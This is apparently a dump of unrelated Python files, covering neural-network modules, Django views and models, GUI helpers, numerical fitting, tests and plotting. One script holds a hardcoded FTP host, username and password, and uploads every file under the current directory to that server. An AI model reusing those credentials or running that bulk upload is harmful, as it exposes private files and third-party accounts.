x = torch.cat((x, pos), 1)
x = self.fc1(x)
x = self.relu1(x)
mean = self.tanh(self.fc_mean(x))
std = self.sigmoid(self.fc_std(x)) + 1e-5
return mean, std
def choose_action(self, state):
mean, std = self.forward(state)
dis = Normal(mean, std)
return dis.sample().numpy()
class MLPValue1024(nn.Module):
def __init__(self, state_dim=1024):
super(MLPValue1024, self).__init__()
self.fc1 = nn.Linear(state_dim+2, 100)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(100, 1)
self.tanh = nn.Tanh()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc2.weight.data)
def forward(self, x, pos):
x = torch.cat((x, pos), 1)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
|
def interface_error_msg(interface, error_msg="Erro: Desconhecido"):
interface.label_erro.setText(error_msg)
def interface_status_msg(interface, status_msg="Desconhecido"):
interface.label_status.setText(status_msg)
def interface_scan_start(interface):
interface.botao_vai.setEnabled(False)
interface.botao_parar.setEnabled(True)
interface.botao_instrumento.setEnabled(False)
interface.box_nome.setEnabled(False)
interface.botao_salvar.setEnabled(False)
###
interface_error_msg(interface," ")
interface_status_msg(interface,"Iniciando...")
def get_commander_port(interface):
### Extrai o nome do recurso do combobox
### O Recurso tem o padrao de COMd onde d é um digito.
import re
txt = interface.box_controlador.currentText()
return re.search(r'(COM\d*)', txt).group(0)
def interface_matrix_start(interface):
interface.botao_vai.setEnabled(False)
interface.botao_parar.setEnabled(False)
interface.botao_instrumento.setEnabled(False)
interface.box_nome.setEnabled(False)
interface.botao_salvar.setEnabled(False)
interface.box_config.setEnabled(False)
###
interface_error_msg(interface," ")
interface_status_msg(interface,"Programando...")
def interface_matrix_end(interface):
interface.botao_vai.setEnabled(True)
interface.botao_parar.setEnabled(False)
interface.botao_instrumento.setEnabled(True)
interface.box_nome.setEnabled(True)
interface.botao_salvar.setEnabled(True)
interface.box_config.setEnabled(True)
###
interface_error_msg(interface," ")
interface_status_msg(interface,"Esperando")
def interface_scan_finished(interface):
interface_update_filename(interface)
interface.botao_vai.setEnabled(True)
interface.botao_parar.setEnabled(False)
interface.botao_instrumento.setEnabled(True)
interface.box_nome.setEnabled(True)
interface.botao_salvar.setEnabled(True)
def get_unit(interface):
unidades = {"kHz": 1000,
"MHz": 1000000,
"GHz": 1000000000}
return unidades[str(interface.box_frequencia_unidade.currentText())]
def get_frequency(interface):
freq = interface.box_frequencia.value()
return freq * get_unit(interface)
def interface_update_filename(interface):
import datetime
interface.box_nome.setText("arquivo_" + datetime.datetime.now().strftime("%d-%m-%Y %H-%M-%S"))
def get_X(interface):
return interface.box_dimensao_X.value()
def get_Y(interface):
return interface.box_dimensao_Y.value()
def get_filename(interface):
return interface.box_nome.text() |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from .models import blog, Author, Category
from .forms import PostForm, SignUpForm
from django.shortcuts import redirect
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate, logout
def index(request):
num_blog = blog.objects.all().count()
num_authors=Author.objects.count()
blogs = blog.objects.all()
authors = Author.objects.all()
return render(
request,
'index.html',
context={'num_blog':num_blog, 'num_authors':num_authors, 'blogs':blogs, 'authors':authors,},
)
def detail(request, blog_id):
thisblog = get_object_or_404(blog, pk=blog_id)
return render(request, 'details.html', {'blog':thisblog})
@login_required
def newblog(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.published = timezone.now()
author = Author.objects.get(pk=request.user.pk)
post.author = author
post.save()
return redirect('index')
else:
form = PostForm()
return render(request, 'newblog.html',{'form':form})
def SignUp(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password1')
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
date_of_birth = form.cleaned_data.get('date_of_birth')
user = authenticate(username=username, password=password)
author = Author.objects.create(user=user, first_name=first_name, last_name=last_name, date_of_birth=date_of_birth)
login(request, user)
return redirect('index')
else:
form = SignUpForm()
return render(request, 'signup.html', {'form':form})
@login_required
def LogOut(request):
logout(request)
return redirect('index')
def profile(request,username):
print(str(username))
author = get_object_or_404(Author, user__username=username)
blogs = blog.objects.all().filter(author__user__username=username)
return render(request, 'profile.html', {'author':author, 'blogs':blogs})
|
from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
setup(
name='game-of-life',
version='0.1.0',
description='Sample Game of Life',
long_description=readme,
author='mpoqq',
author_email='matthias.poqq@gmail.com',
license=license,
packages=find_packages(exclude='examples')
)
|
#!/usr/bin/env python
"""Mandelbrot set renderer.
@author: Stephan Wenger
@date: 2012-03-23
"""
from numpy import linspace, array, minimum, maximum, cos, pi
from matplotlib import cm
from glitter import ShaderProgram, get_fullscreen_quad, Texture1D
from glitter.contexts.glut import GlutWindow, main_loop, get_elapsed_time
from glitter.raw import glut
vertex_shader = """
#version 400 core
layout(location=0) in vec4 in_position;
uniform vec2 minval, maxval;
out vec2 ex_texcoord;
void main() {
gl_Position = in_position;
ex_texcoord = (in_position.xy * 0.5 + 0.5) * (maxval - minval) + minval;
}
"""
fragment_shader = """
#version 400 core
#extension GL_ARB_texture_rectangle : enable
in vec2 ex_texcoord;
uniform sampler1D colormap;
layout(location=0) out vec4 out_color;
const int max_iteration = 1000;
void main() {
vec2 xy = vec2(0.0, 0.0);
int iteration = 0;
while (xy.x * xy.x + xy.y * xy.y < 4 && iteration < max_iteration) {
xy = vec2(xy.x * xy.x - xy.y * xy.y + ex_texcoord.x, 2 * xy.x * xy.y + ex_texcoord.y);
iteration++;
}
float c = iteration - log(log(length(xy)));
out_color = texture(colormap, 0.1 * c);
}
"""
class MandelbrotRenderer(object):
transition_time = 0.3 # seconds
update_step = 10 # milliseconds
def __init__(self):
self.window = GlutWindow(double=True, multisample=True)
self.window.display_callback = self.display
self.window.mouse_callback = self.mouse
self.shader = ShaderProgram(vertex=vertex_shader, fragment=fragment_shader)
self.shader.colormap = Texture1D(cm.spectral(linspace(0, 1, 256)), wrap_s="MIRRORED_REPEAT")
self.shader.minval = (-2.5, -1.75)
self.shader.maxval = (1.0, 1.75)
self.vao = get_fullscreen_quad()
self.history = []
def display(self):
self.window.clear()
self.vao.draw()
self.window.swap_buffers()
def timer(self):
t = min(1.0, (get_elapsed_time() - self.transition_start) / self.transition_time)
x = 0.5 - 0.5 * cos(pi * t)
self.shader.minval = self.minstart * (1 - x) + self.minend * x
self.shader.maxval = self.maxstart * (1 - x) + self.maxend * x
if t < 1:
self.window.add_timer(self.update_step, self.timer)
self.window.post_redisplay()
def start_transition(self, minval, maxval):
self.minstart, self.maxstart = self.shader.minval, self.shader.maxval
self.minend, self.maxend = minval, maxval
self.transition_start = get_elapsed_time()
self.timer()
def mouse(self, button, state, x, y):
if button == glut.GLUT_LEFT_BUTTON:
pos = array((x, self.window.shape[0] - y)) / array(self.window.shape[::-1], dtype=float)
pos = pos * (self.shader.maxval - self.shader.minval) + self.shader.minval
if state == glut.GLUT_DOWN:
self.last_pos = pos
elif state == glut.GLUT_UP and all(pos != self.last_pos):
self.history.append((self.shader.minval, self.shader.maxval))
self.start_transition(minimum(pos, self.last_pos), maximum(pos, self.last_pos))
elif state == glut.GLUT_DOWN and button == glut.GLUT_RIGHT_BUTTON:
if self.history:
self.start_transition(*self.history.pop())
def run(self):
with self.shader:
main_loop()
if __name__ == "__main__":
MandelbrotRenderer().run()
|
#!/usr/bin/python
import PTY_Interface
import PowerSupply
pty = PTY_Interface.Interface()
pty.addDevice(PowerSupply.PowerSupply(), 5)
pty.addDevice(PowerSupply.E3631A(), 3)
pty.printFilename()
pty.run()
|
import sys
import timeseries.ArrayTimeSeries as ts
import simsearch.SimilaritySearch as ss
import numpy as np
import simsearch.database as rbtreeDB
from storagemanager.FileStorageManager import FileStorageManager
def load_ts_data(file_name):
"load timeseries data form given file name"
ts_raw_data = np.loadtxt(file_name, delimiter=' ')
ts_data = ts.ArrayTimeSeries(ts_raw_data[:, 1], ts_raw_data[:, 0])
return ts_data
def max_similarity_search(input_ts):
"""
find the most similar vantage point of the target TS
return tuple (minimum distance, vantage point, timeseries file name)
"""
fsm = FileStorageManager()
comp_ts = input_ts
std_comp_ts = ss.standardize(comp_ts)
min_dis = float('inf')
min_db_name = ""
min_ts_file_name = ""
for i in range(20):
db_name = "vpDB/db_" + str(i) + ".dbdb"
db = rbtreeDB.connect(db_name)
ts_id = db.get(0)
vp_ts = fsm.get(ts_id)
std_vp_ts = ss.standardize(vp_ts)
curr_dis = ss.kernel_dis(std_vp_ts, std_comp_ts)
if min_dis > curr_dis:
min_dis = curr_dis
min_db_name = db_name
min_ts_id = ts_id
return min_dis, min_db_name, min_ts_id
def kth_similarity_search(input_ts, min_dis, min_db_name, k=1):
"""
find the most kth similar timeseries data
return file names in an array
"""
fsm = FileStorageManager()
db = rbtreeDB.connect(min_db_name)
keys, ts_ids = db.get_smaller_nodes(2.0 * min_dis)
kth_ts_list = []
for ts_id in ts_ids:
res_ts = fsm.get(ts_id)
std_res_ts = ss.standardize(res_ts)
curr_dis = ss.kernel_dis(std_res_ts, input_ts)
kth_ts_list.append((curr_dis, ts_id))
# sort in ascending order by distance
kth_ts_list.sort(key=lambda kv: kv[0])
# ill situation
if (len(kth_ts_list) <= k):
return kth_ts_list
else:
return kth_ts_list[: k]
def find_kth_similarity(input_file_name, k):
"""
main function
:param input_file_name: input TS file name to be compared
:param k: top k similar nodes compared to input TS file
:return: print the most kth similar timeseries file name
"""
input_ts = load_ts_data(input_file_name)
min_dis, min_db_name, min_ts_file_name = max_similarity_search(input_ts)
kth_similarity_list = kth_similarity_search(input_ts, min_dis, min_db_name, k)
print("The %dth closest TimeSeries data of %s is:" % (k, input_file_name))
for i in range(len(kth_similarity_list)):
print("No.%d %s" % (i + 1, kth_similarity_list[i][1]))
if __name__ == "__main__":
input_file_name = sys.argv[1]
k = int(sys.argv[2])
find_kth_similarity(input_file_name, k)
|
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.views.generic import CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy
from .models import Department
from .form import DepartmentForm
from django.shortcuts import redirect
from django.contrib.admin.views.decorators import staff_member_required
from django.utils.decorators import method_decorator
class StaffRequiredMixin(object):
"""
Este mixin requerira que el usuario sea miembro del stuff
"""
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(StaffRequiredMixin, self).dispatch(request, *args, **kwargs)
class DepartmentListView(ListView):
model = Department
class DepartmentsDetailView(DetailView):
model = Department
@method_decorator(staff_member_required, name="dispatch")
class DepartmentCreateView(CreateView):
model = Department
form_class = DepartmentForm
success_url = reverse_lazy('departments:departments')
@method_decorator(staff_member_required, name="dispatch")
class DepartmentUpdateView(UpdateView):
model = Department
form_class = DepartmentForm
template_name_suffix = '_update_form'
def get_success_url(self):
return reverse_lazy('departments:update', args=[self.object.id]) + '?ok'
@method_decorator(staff_member_required, name="dispatch")
class DepartmentDeleteView(DeleteView):
model = Department
success_url = reverse_lazy('departments:departments')
|
from ftplib import FTP
import os
host = 'office.ai4health.com'
port = 8021
username = 'zjjm'
password = 'ftp_123_zjjm'
def ftpconnect(host, port, username, password):
ftp = FTP()
# ftp.set_debuglevel(2)
ftp.connect(host, port)
ftp.login(username, password)
return ftp
def downloadfile(ftp, remotepath, localpath):
bufsize = 1024
fp = open(localpath, 'wb')
ftp.retrbinary('RETR ' + remotepath, fp.write, bufsize)
ftp.set_debuglevel(0)
fp.close()
def uploadfile(ftp, remotepath, localpath):
bufsize = 1024
fp = open(localpath, 'rb')
ftp.storbinary('STOR ' + remotepath, fp, bufsize)
ftp.set_debuglevel(0)
fp.close()
if __name__ == "__main__":
ftp = ftpconnect(host, port, username, password)
for root, dirs, files in os.walk('./'):
for file1 in files:
file_name = os.path.join(root, file1)
print(file_name)
uploadfile(ftp, os.path.join("/qwj/arburg/test", file_name[2:]), file_name)
ftp.quit()
|
# 평범한 배낭
"""
dynamic programming
- 2차원 dp 생성
- 점화식 : dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - weight[i]] + value[i]) if j - weight[i] >= 0 else dp[i][j] = dp[i - 1][j]
"""
import sys
sys.stdin = open('C:\github\Algorithm\Dynamic-Programming\input.txt', 'rt')
# input = sys.stdin.readline
n, k = map(int, input().split())
dp = [[0] * (k + 1) for _ in range(n + 1)]
weight = [0]
value = [0]
for _ in range(n):
w, v = map(int, input().split())
weight.append(w)
value.append(v)
for i in range(1, n + 1):
for j in range(1, k + 1):
if j - weight[i] >= 0:
dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - weight[i]] + value[i])
else:
dp[i][j] = dp[i - 1][j]
print(dp[n][k])
|
import abc
from typing import Dict, List
from job_search.domain.jobs.value_objects.job_type import JobInfo
from job_search.domain.jobs.value_objects.simple_objects import ContactInfo, LocationInfo
import job_search.repository.jobs.entities.job_entity as entities
class JobRepository(metaclass=abc.ABCMeta):
@abc.abstractmethod
def persist(self, job: JobInfo) -> None:
raise NotImplementedError('persist is not implemented')
@abc.abstractmethod
def load(self, job_id: str) -> JobInfo:
raise NotImplementedError('load is not implemented')
@abc.abstractmethod
def load_all_jobs(self) -> List[JobInfo]:
raise NotImplementedError('load is not implemented')
@abc.abstractmethod
def find_title(self, title: str) -> entities.TitleEntity:
raise NotImplementedError('find_title is not implemented')
@abc.abstractmethod
def find_company(self, company: str) -> entities.CompanyEntity:
raise NotImplementedError('find_company is not implemented')
@abc.abstractmethod
def find_location(self, location: LocationInfo) -> entities.LocationEntity:
raise NotImplementedError('find_location is not implemented')
@abc.abstractmethod
def find_city(self, city: str) -> entities.CityEntity:
raise NotImplementedError('find_city is not implemented')
@abc.abstractmethod
def find_state(self, state: str) -> entities.StateEntity:
raise NotImplementedError('find_state is not implemented')
@abc.abstractmethod
def find_country(self, country: str) -> entities.CountryEntity:
raise NotImplementedError('find_country is not implemented')
@abc.abstractmethod
def find_contact_info(self, info: ContactInfo) -> entities.ContactInfoEntity:
raise NotImplementedError('find_contact_info is not implemented')
@abc.abstractmethod
def find_contact_name(self, name: str) -> entities.ContactNameEntity:
raise NotImplementedError('find_contact_name is not implemented')
@abc.abstractmethod
def find_contact_email(self, email: str) -> entities.ContactEmailEntity:
raise NotImplementedError('find_contact_email is not implemented')
@abc.abstractmethod
def find_contact_website(self, website: str) -> entities.ContactWebsiteEntity:
raise NotImplementedError('find_contact_website is not implemented')
@abc.abstractmethod
def find_restrictions(self, restrictions: List[str]) -> Dict:
raise NotImplementedError('find_restrictions is not implemented')
@abc.abstractmethod
def find_requirements(self, requirements: List[str]) -> Dict:
raise NotImplementedError('find_requirements is not impemented')
@abc.abstractmethod
def find_source(self, source: str) -> entities.SourceEntity:
raise NotImplementedError('find_source is not implemented')
|
from setuptools import setup
from tumblr_reader import __version__
setup(
name='django-tumblr-reader',
version=__version__,
author='Zach Snow',
author_email='z@zachsnow.com',
packages=['tumblr_reader', 'tumblr_reader.templatetags'],
include_package_data=True,
url='http://zachsnow.com/projects/',
license='LICENSE.rst',
description=r"""django-tumblr-reader is a simple, reusable Django application that defines template tags for embedding your Tumblr blog in your Django website.""",
long_description=open('README.rst').read(),
)
|
# Copyright (c) 2011 Alun Morgan, Michael Abbott, Diamond Light Source Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contact:
# Diamond Light Source Ltd,
# Diamond House,
# Chilton,
# Didcot,
# Oxfordshire,
# OX11 0DE
# alun.morgan@diamond.ac.uk, michael.abbott@diamond.ac.uk
'''Gauss-Newton / Levenberg Marquardt nonlinear least squares'''
from numpy import arange, inner, zeros, dot, absolute, multiply
from numpy.linalg import solve
def diag_ix(N):
'''Returns a value suitable for indexing the diagonal of a square NxN
matrix.'''
return arange(N), arange(N)
def levmar_core(fdf, a, lam=1e-3, maxiter=10):
'''Minimal implementation of Levenberg-Marquardt fitting with fixed
lambda and without termination testing. Note that this implementation
updates a in place, which may not be desireable, and computes a fixed number
of iterations. Use the implementation below for proper work.'''
d = diag_ix(len(a)) # Diagonal index for updating alpha
for s in range(maxiter):
e, de = fdf(a) # Compute e and its derivatives
beta = inner(de, e) # Compute basic gradient vector
alpha = inner(de, de) # Approximate Hessian from derivatives
alpha[d] *= 1 + lam # Scale Hessian diagonal by lambda
a -= solve(alpha, beta) # Step to next position
return a
# Possible termination reasons for exit from levmar() routine. Lowest number is
# best.
LEVMAR_STATUS_CTOL = 0 # Absolute chi squared tolerance satisfied
LEVMAR_STATUS_FTOL = 1 # Relative chi squared tolerance satisfied
LEVMAR_STATUS_ITER = 2 # Max iterations exhausted
LEVMAR_STATUS_LAMBDA = 3 # Limit on lambda reached, convergence failed.
def levmar(f, df, a,
ftol=1e-6, ctol=1e-6, lam=1e-3, maxiter=20, max_lambda=1e8):
'''Levenberg-Marquardt non-linear optimisation. Takes three mandatory
parameters and a handful of control parameters.
f A function taking an N dimensional vector and returning an M dimensional
array representing the error function. The optimisation process here
will adjust the parameter vector to minimise the sum of squares of the
values, chi2 = sum(f(a)). Note that both the input and output arrays
have a one dimensional shape.
df A function taking an N dimensional vector and returning an MxN
dimensional array containing the partial derivatives of f with respect
to its input parameters. To be precise,
df(a)[k,i] = derivative of f(a) with respect to parameter i in a.
a The initial starting point for optimisation. This must be an N
dimensional vector.
The result of calling levmar(f, df, a) is a 3-tuple containing the optimal
value for a, the corresponding chi2 value, the number of iterations (less
one), and a status code thus:
new_a, chi2, iter, status = levmar(f, df, a)
The following status codes can be returned:
LEVMAR_STATUS_CTOL = 0 Absolute chi squared tolerance satisfied
LEVMAR_STATUS_FTOL = 1 Relative chi squared tolerance satisfied
LEVMAR_STATUS_ITER = 2 Max iterations exhausted
LEVMAR_STATUS_LAMBDA = 3 Limit on lambda reached, convergence failed.
The other parameters control termination:
ftol=1e-6
Fractional tolerance on chi2. Searching will terminate when the
fractional reduction in chi2 is less than ftol.
ctol=0
Absolute tolerance on chi2. Searching will terminate when chi2 is less
than this value. The default value for ctol has no effect.
maxiter=20
Maximum number of outer loops (evaluations of df()).
lam=1e-3
max_lambda=1e6
Initial linearisation scaling factor and ceiling on this value.
'''
d = diag_ix(len(a)) # Diagonal index for updating alpha
# Initial function and chi2.
e = f(a)
assert e is not None, 'Bad initial parameters'
chi2 = (e ** 2).sum()
for iter in xrange(maxiter):
# From Jacobian matrix compute alpha0, an estimate of the Hessian, and
# beta, (half) the gradient vector.
de = df(a)
beta = inner(de, e)
alpha0 = inner(de, de)
# set any near-zero entries to zero since these cause numpy to crash the processing thread!
beta = multiply(absolute(beta) > 1e-100, beta)
alpha0 = multiply(absolute(alpha0) > 1e-100, alpha0)
# Now seek a lambda which actually improves the value of chi2
while lam < max_lambda:
# Compute alpha = alpha0 * (1 + diag(lam)) and use this to compute
# the next value for a.
# Assess the new position.
alpha = +alpha0
alpha[d] *= 1 + lam
x = solve(alpha, beta) # solve(alpha, beta)
a_new = a - x
e = f(a_new)
if e is None:
# Oops. Outside the boundary. Increasing lam should eventually
# bring us closer to a.
lam *= 10.
else:
chi2_new = (e ** 2).sum()
if chi2_new > chi2:
# Worse. Try again closer to a and with a more linear fit.
lam *= 10.
else:
# Good. We have an improvement.
break
else:
# max_lambda reached. Give up now.
return a, chi2, iter, LEVMAR_STATUS_LAMBDA
a = a_new
lam *= 0.1
if chi2_new < ctol:
return a, chi2_new, iter, LEVMAR_STATUS_CTOL
elif chi2 - chi2_new < ftol * chi2_new:
# Looks like this is good enough. Either chi2 is small enough or
# the fractional improvement is so small that we're good enough.
return a, chi2_new, iter, LEVMAR_STATUS_FTOL
else:
chi2 = chi2_new
# Iterations exhausted.
return a, chi2, iter, LEVMAR_STATUS_ITER
class FitError(Exception):
'''Exception raised in response to fitting failure.'''
def fit(valid, function, derivative, initial, target, args, **kargs):
'''Wrapper for the fitting process. Takes the following arguments and
returns the best fit of the parameters to the data and the resulting chi2.
valid(params)
Validates parameters array, returns true iff function can safely be
called on the given parameter set.
function(params, args)
Computes function at parameters and fixed args, returns an array of
numbers which will be compared with the target value data.
derivative(params, args)
Computes the derivative of function with respect to each parameter,
returns a two dimensional array with the first dimension ranging
over the parameters.
initial
Initial starting point for the parameters used above.
target
Target array. The parameter vector will be adjusted to minimise the
squared difference between function(params,...) and target.
args
Argument passed directly to function() and derivative().
**kargs
Keyword arguments passed through to levmar(), used to control
convergence and iterations.
'''
def error(params):
if valid is None or valid(params):
val = function(params, *args)
return val - target
else:
return None
def Jacobian(params):
return derivative(params, *args)
result, chi2, _, status = levmar(error, Jacobian, initial, **kargs)
if status == LEVMAR_STATUS_ITER:
raise FitError('Iterations exhausted without an adequate fit')
elif status == LEVMAR_STATUS_LAMBDA:
raise FitError('Lambda runaway, fit failed')
return result, chi2
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import collections
class HeadersDict(collections.MutableMapping):
"""
A mapping class suitable as HTTP headers.
All the keys are compared lower-case and with all the ``_``
replaced by ``-``.
"""
def __init__(self, headers=None):
self.headers = {}
if headers:
self.update(headers)
def __setitem__(self, key, value):
if isinstance(value, unicode):
value = value.encode('iso-8859-1')
else:
value = str(value)
self.headers[key.replace('_', '-').lower()] = value
def __getitem__(self, key):
return self.headers[key.replace('_', '-').lower()]
def __delitem__(self, key):
del self.headers[key.replace('_', '-').lower()]
def __iter__(self):
return iter(self.headers)
def __len__(self):
return len(self.headers)
def __contains__(self, key):
return key.replace('_', '-').lower() in self.headers
def __repr__(self):
return repr(self.headers)
|
#!/usr/bin/env python3
from typing import cast
import torch
from torch import Tensor
from captum.attr._utils.gradient import (
apply_gradient_requirements,
compute_gradients,
compute_layer_gradients_and_eval,
undo_gradient_requirements,
)
from .helpers.basic_models import (
BasicModel,
BasicModel6_MultiTensor,
BasicModel_MultiLayer,
)
from .helpers.utils import BaseTest, assertArraysAlmostEqual
class Test(BaseTest):
def test_apply_gradient_reqs(self) -> None:
initial_grads = [False, True, False]
test_tensor = torch.tensor([[6.0]], requires_grad=True)
test_tensor.grad = torch.tensor([[7.0]])
test_tensor_tuple = (torch.tensor([[5.0]]), test_tensor, torch.tensor([[7.0]]))
out_mask = apply_gradient_requirements(test_tensor_tuple)
for i in range(len(test_tensor_tuple)):
self.assertTrue(test_tensor_tuple[i].requires_grad)
self.assertEqual(out_mask[i], initial_grads[i])
if test_tensor_tuple[i].grad is not None:
self.assertAlmostEqual(
torch.sum(cast(Tensor, test_tensor_tuple[i].grad)).item(), 0.0
)
def test_undo_gradient_reqs(self) -> None:
initial_grads = [False, True, False]
test_tensor = torch.tensor([[6.0]], requires_grad=True)
test_tensor.grad = torch.tensor([[7.0]])
test_tensor_tuple = (
torch.tensor([[6.0]], requires_grad=True),
test_tensor,
torch.tensor([[7.0]], requires_grad=True),
)
undo_gradient_requirements(test_tensor_tuple, initial_grads)
for i in range(len(test_tensor_tuple)):
self.assertEqual(test_tensor_tuple[i].requires_grad, initial_grads[i])
if test_tensor_tuple[i].grad is not None:
self.assertAlmostEqual(
torch.sum(cast(Tensor, test_tensor_tuple[i].grad)).item(), 0.0
)
def test_gradient_basic(self) -> None:
model = BasicModel()
input = torch.tensor([[5.0]], requires_grad=True)
grads = compute_gradients(model, input)[0]
assertArraysAlmostEqual(grads.squeeze(0).tolist(), [0.0], delta=0.01)
def test_gradient_basic_2(self) -> None:
model = BasicModel()
input = torch.tensor([[-3.0]], requires_grad=True)
grads = compute_gradients(model, input)[0]
assertArraysAlmostEqual(grads.squeeze(0).tolist(), [1.0], delta=0.01)
def test_gradient_multiinput(self) -> None:
model = BasicModel6_MultiTensor()
input1 = torch.tensor([[-3.0, -5.0]], requires_grad=True)
input2 = torch.tensor([[-5.0, 2.0]], requires_grad=True)
grads = compute_gradients(model, (input1, input2))
assertArraysAlmostEqual(grads[0].squeeze(0).tolist(), [0.0, 1.0], delta=0.01)
assertArraysAlmostEqual(grads[1].squeeze(0).tolist(), [0.0, 1.0], delta=0.01)
def test_layer_gradient_linear0(self) -> None:
model = BasicModel_MultiLayer()
input = torch.tensor([[5.0, -11.0, 23.0]], requires_grad=True)
grads, eval, _ = compute_layer_gradients_and_eval(
model, model.linear0, input, target_ind=0
)
assertArraysAlmostEqual(
grads[0].squeeze(0).tolist(), [4.0, 4.0, 4.0], delta=0.01
)
assertArraysAlmostEqual(
eval[0].squeeze(0).tolist(), [5.0, -11.0, 23.0], delta=0.01
)
def test_layer_gradient_linear1(self) -> None:
model = BasicModel_MultiLayer()
input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
grads, eval, _ = compute_layer_gradients_and_eval(
model, model.linear1, input, target_ind=1
)
assertArraysAlmostEqual(
grads[0].squeeze(0).tolist(), [0.0, 1.0, 1.0, 1.0], delta=0.01
)
assertArraysAlmostEqual(
eval[0].squeeze(0).tolist(), [-2.0, 9.0, 9.0, 9.0], delta=0.01
)
def test_layer_gradient_linear1_inplace(self) -> None:
model = BasicModel_MultiLayer(inplace=True)
input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
grads, eval, is_layer_tuple = compute_layer_gradients_and_eval(
model, model.linear1, input, target_ind=1
)
assertArraysAlmostEqual(
grads[0].squeeze(0).tolist(), [0.0, 1.0, 1.0, 1.0], delta=0.01
)
assertArraysAlmostEqual(
eval[0].squeeze(0).tolist(), [-2.0, 9.0, 9.0, 9.0], delta=0.01
)
self.assertFalse(
is_layer_tuple, ("Layer output should not be wrapped in " "a tuple.")
)
def test_layer_gradient_relu_input_inplace(self) -> None:
model = BasicModel_MultiLayer(inplace=True)
input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
grads, eval, is_layer_tuple = compute_layer_gradients_and_eval(
model, model.relu, input, target_ind=1, attribute_to_layer_input=True
)
assertArraysAlmostEqual(
grads[0].squeeze(0).tolist(), [0.0, 1.0, 1.0, 1.0], delta=0.01
)
assertArraysAlmostEqual(
eval[0].squeeze(0).tolist(), [-2.0, 9.0, 9.0, 9.0], delta=0.01
)
self.assertTrue(is_layer_tuple, "Layer input should be wrapped in a tuple.")
def test_layer_gradient_output(self) -> None:
model = BasicModel_MultiLayer()
input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
grads, eval, _ = compute_layer_gradients_and_eval(
model, model.linear2, input, target_ind=1
)
assertArraysAlmostEqual(grads[0].squeeze(0).tolist(), [0.0, 1.0], delta=0.01)
assertArraysAlmostEqual(eval[0].squeeze(0).tolist(), [26.0, 28.0], delta=0.01)
|
from .load import scHiCs
from .analysis import kmeans, spectral_clustering, HAC
from .analysis import scatter, interactive_scatter
from .embedding import PCA, MDS, tSNE, SpectralEmbedding, PHATE
|
#warna termux
birutua = "\033[0;34m"
putih = "\033[0m"
kuning = "\033[1;33m"
hijau = "\033[1;32m"
merah = "\033[1;31m"
biru = "\033[0;36m"
ungu = "\033[1;35m"
|
from __future__ import unicode_literals
from django.db import models
import re
import bcrypt
# Create your models here.
class UserManager(models.Manager):
def basic_validator(self, postData):
errors = {}
if len(postData['name']) < 3:
errors["name"] = "name must be at least 2 chars"
if len(postData['username']) < 1:
errors["username"] = "username cannot be blank"
if len(User.objects.filter(username = postData['username'])) > 0:
errors["username"] = "username taken"
if len(postData['password']) < 8:
errors["password"] = "password must be at least 8 characters"
if len(postData['confirm']) < 1:
errors["confirm"] = "confirm cannot be blank"
if not postData['password'] == postData['confirm']:
errors["password"] = "passwords must match"
if len(errors) == 0:
hash_pw = bcrypt.hashpw(postData['password'].encode(), bcrypt.gensalt())
new_user = User.objects.create(name = postData['name'], username = postData['username'], password = hash_pw, date = postData['date'])
errors['new_user'] = new_user
return errors
def login_validator(self, postData):
errors = {}
hash1 = User.objects.filter(username = postData['username'])
if hash1:
if bcrypt.checkpw(postData['login_password'].encode(), hash1[0].password.encode()):
errors['user'] = hash1[0]
else:
errors['invalid_password'] = "invalid password"
else:
errors['no_email'] = "invalid username"
return errors
class User(models.Model):
name = models.CharField(max_length = 100)
username = models.CharField(max_length = 100)
password = models.CharField(max_length = 100)
date = models.DateField(default = "")
created_at = models.DateTimeField(auto_now_add = True)
objects = UserManager()
class Item(models.Model):
name = models.CharField(max_length = 100)
creator = models.ForeignKey(User, related_name = "items")
wishlists = models.ManyToManyField(User, related_name = "wishlist")
created_at = models.DateTimeField(auto_now_add = True)
|
import numpy as np
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
x=range(2)
y=[214, 17]
y1=[188 , 31 ]
y2=[213 , 13 ]
y3=[175 , 19 ]
y4=[205 , 10]
plt.axis([-0.2, 1.2, 0, 250])
ax.set_xticks(x)
ax.tick_params('both',direction='in', which='both', pad=1, bottom = 'on', top = 'on', left = 'on', right = 'on', labelcolor='black')
ax.yaxis.grid(color='grey', linestyle='-', linewidth=1, alpha=0.5)
ax.xaxis.grid(color='white', linestyle='', linewidth=1, alpha=1)
#ax.set_xticklabels( [-20, 0, 20,40, 80, 120, 160, 200, 400, 600, 800, 1000, 3000, 5000], fontproperties=font)
plt.plot(x,y,label='Actual',linewidth=2, color='r', marker='x', ms=15, markeredgewidth=3)
plt.plot(x,y1,label='7.5GB',linewidth=2, color='g', marker='^', ms=12, fillstyle='none',markeredgewidth=3)
